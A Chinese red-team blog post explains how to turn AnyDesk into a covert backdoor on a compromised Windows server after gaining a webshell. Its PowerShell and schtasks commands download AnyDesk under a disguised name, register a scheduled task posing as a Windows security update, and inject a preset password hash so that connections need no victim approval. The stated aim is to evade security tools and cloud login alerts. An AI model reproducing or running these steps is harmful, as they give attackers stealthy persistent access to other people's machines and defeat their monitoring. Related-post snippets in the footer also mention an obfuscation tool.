使用AnyDesk做远控

最新推荐文章于 2024-02-07 12:00:00 发布
最新推荐文章于 2024-02-07 12:00:00 发布
阅读量1.6k 收藏
点赞数
分类专栏: Red Team
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44216796/article/details/112118108
版权

简介

AnyDesk是类似teamviewer的远程桌面管理软件,但是它不用安装,而且体积比较小只有2.84MB

使用场景举例

  1. 有云锁,护卫神等禁止3389登录时
  2. 类似阿里云这种,登录3389会报警
  3. 连接内网中可以出网的windows机器

注意事项

  1. 启动AnyDesk的权限需要桌面用户权限,比如,IIS做中间件的环境中,拿到了webshell一般般都是没有桌面用户权限的,如果启动AnyDesk不会成功
  2. 启动AnyDesk时桌面不能被注销
  3. 有可能连接上去是黑屏,这个是因为该桌面用户退出远程桌面但没有注销,此时,除非能用winlogon启动AnyDesk,否则没法使用屏幕

使用

下载AnyDesk到一个公共目录下(这里我用的是IIS服务目录)

powershell "(New-Object System.Net.WebClient).DownloadFile(\"https://download.anydesk.com/AnyDesk.exe\",\"C:\inetpub\wwwroot\winudate.exe\")

在这里插入图片描述
在这里插入图片描述

确定哪些用户当前在使用桌面

powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0]

在这里插入图片描述

启动一个计划任务,启动的用户为上个步骤选中的用户

schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\inetpub\wwwroot\winudate.exe" /RU Administrator

在这里插入图片描述

先执行一次计划任务,生成配置文件

schtasks /run /tn Windows_Security_Update

在这里插入图片描述
在这里插入图片描述

等待几秒,等AnyDesk成功连接到网络,再把AnyDesk进程杀掉,dir看用户下面是否生成配置文件。(\AppData\Roaming目录为隐藏目录,需要点击菜单栏->查看->隐藏的项目)
在这里插入图片描述
在这里插入图片描述
然后再service.conf里 面的添加密码(AnyDeskGetAccess)

echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\Administrator\AppData\Roaming\AnyDesk\service.conf

echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\Administrator\AppData\Roaming\AnyDesk\service.conf

在这里插入图片描述
查看AnyDesk的ID并启动AnyDesk

schtasks /run /tn Windows_Security_Update

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
不需要靶机点击接受,输入密码即可
在这里插入图片描述
在这里插入图片描述

AZ09WY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
AnyDesk 使用 FRP 自建远程桌面连接.doc
10-09
AnyDesk是2014年成立德国软件商,也提供不逊色Teamview的第三方远程桌面服务。相比较windows的远程桌面功能有些单一,teamview又不能改端口,AnyDesk可以完美的兼顾。
ToDesk 远程协助软件 v2.0.4.2官方版
01-08
为您提供ToDesk 远程协助软件下载,ToDesk(远程控制软件)是一款简单好用且流畅的远程协助软件,通过ToDesk用户能够快速对下载了ToDesk的用户进行远程控制,软件使用起来也非常的流畅,有需要的可以下载使用。软件特色  支持远程控制、远程文件传输  支持历史设备快速连接  支持开机自启  支持录制回话和播放计算机声音  支持伙伴登录提醒使用方法  一、下载安装软件。  二、安装完成后打开软件,将用户ID和临时密码告诉对方。
内网远程控制——anydesk
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
02-07 624
而通常这个时候我们有权限修改anydesk的配置文件,这里进行测试,起两个虚拟机,设定一个场景(攻击机拿到了webshell,受害机开着windows defender,如何去渗透拿到受害机权限)
免安装图形化远控AnyDesk
05-15
免安装可以远程控制桌面的工具,支持内网穿透,使用非常方便
AnyDesk v2.5远程桌面连接软件中文版.rar
09-04
软件介绍: AnyDesk2.5号称是最快的一款远程桌面管理软件,它即是客户端也是服务器,当别的电脑输入你的AnyDesk 9位地址时,可以掌控你的计算机,你也可以输入其他工作台的AnyDesk地址,连接管理远程计算机。AnyDesk能够以绿色版运行,也可根据需要安装到计算机中,支持以无人值守方式远程受控管理。AnyDesk使用了先进的技术来解决远程连接速度慢的问题,在使用中能够流畅管理远端电脑,就像是操作本机一样。由于现今网络环境越来越复杂,防火墙、路由器、宽带提供商等等各种因素常常会导致很多直连的远程控制软件(如微软的 Remote Desktop) 操作缓慢甚至是连接错误。而 AnyDesk 给人的印象是速度极快、反应流畅迅速,比起前辈TeamViewer有过之而无不及。
AnyDesk.exe
11-02
AnyDesk使您可以从任何地方远程工作。每当您需要访问远程屏幕时,无论是在办公室楼层还是在世界的另一端,您都可以使用AnyDesk。而且AnyDesk无需要太多复制的控制操作,只需要你在某一设备上下载、安装并启动AnyDesk.exe文件即可开始使用
不用外部软件实现windows远程桌面
2303_77914545的博客
01-13 626
远程桌面软件有许多,大到向日葵,小到RD Client,但能否不用它们就实现远程控制呢?可以的!
Wake On Lan(WOL)失败的原因
梦想是世界和平
06-15 2796
使用Wake On Lan远程开机失败原因。
windows安装anydesk连接ubunt17.10黑屏
dingdongkk~博客
07-16 2566
黑屏原因: ubuntu17.10取消了系统托盘。 解决办法: 更新ubuntu到18.04稳定版即可。 更新方法: 1. ctrl+alt+t进入终端 2. 执行sudo apt-get update 3. 执行sudo apt-get upgrade 4. sudo...
AnyDesk远程连接
April_519的博客
11-01 1818
今天在家使用AnyDesk远程连接公司电脑出现黑屏情况。 解决办法:关闭AnyDesk重新以管理员身份打开,成功解决黑屏情况。
anydesk 远程控制电脑
07-11
AnyDesk(远程控制软件)是一款号称速度最快的免费远程连接/远程桌面控制软件,据说是前TeamViewer 开发小组人员自立门户的产品,它拥有先进的视频压缩技术DeskRT, 可以轻松穿透防火墙/路由器,实测在电信、移动的跨网宽带环境下,速度确实要比TeamViewer 和QQ 流畅
AnyDesk中文版(远程桌面连接)
10-09
受种种因素影响,远程连接桌面的速度通常会比较慢。AnyDesk中文版的开发者试图解决这个问题,它使用DeskRT技术,内含新的视频解码器,并且提供了最简化的登录和控制方式,使你能在现有的PC上体验到更流畅的远程桌面。 AnyDesk中文版主要特点: 专门为现代处理器优化,支持多处理器 特别优化的视频压缩算法 低资源和带宽占用率 与操作系统深度整合
AnyDesk远控桌面
06-07
很好的一个远程桌面软件!我一直在用
AnyDesk(免费版)
03-18
AnyDesk(免费版)
Invoke-Obfuscation
weixin_44216796的博客
01-16 2346
导入项目: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 支持的加密功能列表 TOKEN支持分部分混淆 STRING整条命令混淆 COMPRESS将命令转为单行并压缩, ENCODING编码 LAUNCHER选择执行方式。 使用 set scriptpath C:\Users\Administrator\Desktop\payload.ps1 encoding 1 out x.ps1 powershell -windowsty
获取当前系统所有用户的谷歌浏览器密码
weixin_44216796的博客
02-08 1673
获取当前系统所有用户的谷歌浏览器密码 0x01. 知识简介 1、DPAPI: 全称Data Protection Application Programming Interface Windows系统的一个数据保护接口 主要用于保护加密的数据,常见的应用如: Internet Explorer,Google Chrome中的密码和表单 存储无线连接密码 远程桌面连接密码 Outlook,Windows Mail,Windows Mail等中的电子邮件帐户密码 内部FTP管理员帐户密码 共享文件夹和资源访问密
DNS隧道搭建
weixin_44216796的博客
02-01 1210
前言 在渗透测试工作中,经常会碰到web入口机或内网主机无论使用TCP、UDP都无法使其上线c2服务而且web入口主机被层层waf保护,reg、abtts、 tunna等HTTP代理都无法使用的情况。 但是如果这台主机可以解析域名,或者可以ping出互联网域名指向ip,此时不妨试试通过dns协议进行内网流量传输。自从cobalt strike dns出网方式的加入,越来越多人了解并使用通过dns协议建立隧道并进行内网数据传输,因为dns流量更加隐蔽,防火墙拦截概率低。 环境 测试使用阿里云域名 dnstc
Venom代理转发-多级穿透
weixin_44216796的博客
01-18 917
简介 Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。 Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。 渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。 下载 下载地址 linux下需要赋予执行权限 chmod +x filename 使用 admin端连接指令 监听: admin -lport 8888 连接: admin -rhost 127.0.0.1 -rport 9999 -passwd 9999 -passwd为节点
anydesk使用教程
05-27
好的,下面是 AnyDesk 的使用教程: 1. 首先,您需要下载并安装 AnyDesk 软件。您可以在 AnyDesk 的官方网站上下载最新版本的软件。 2. 安装完成后,您需要打开 AnyDesk 软件。您会看到一个9位数字的 ID 号码,这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值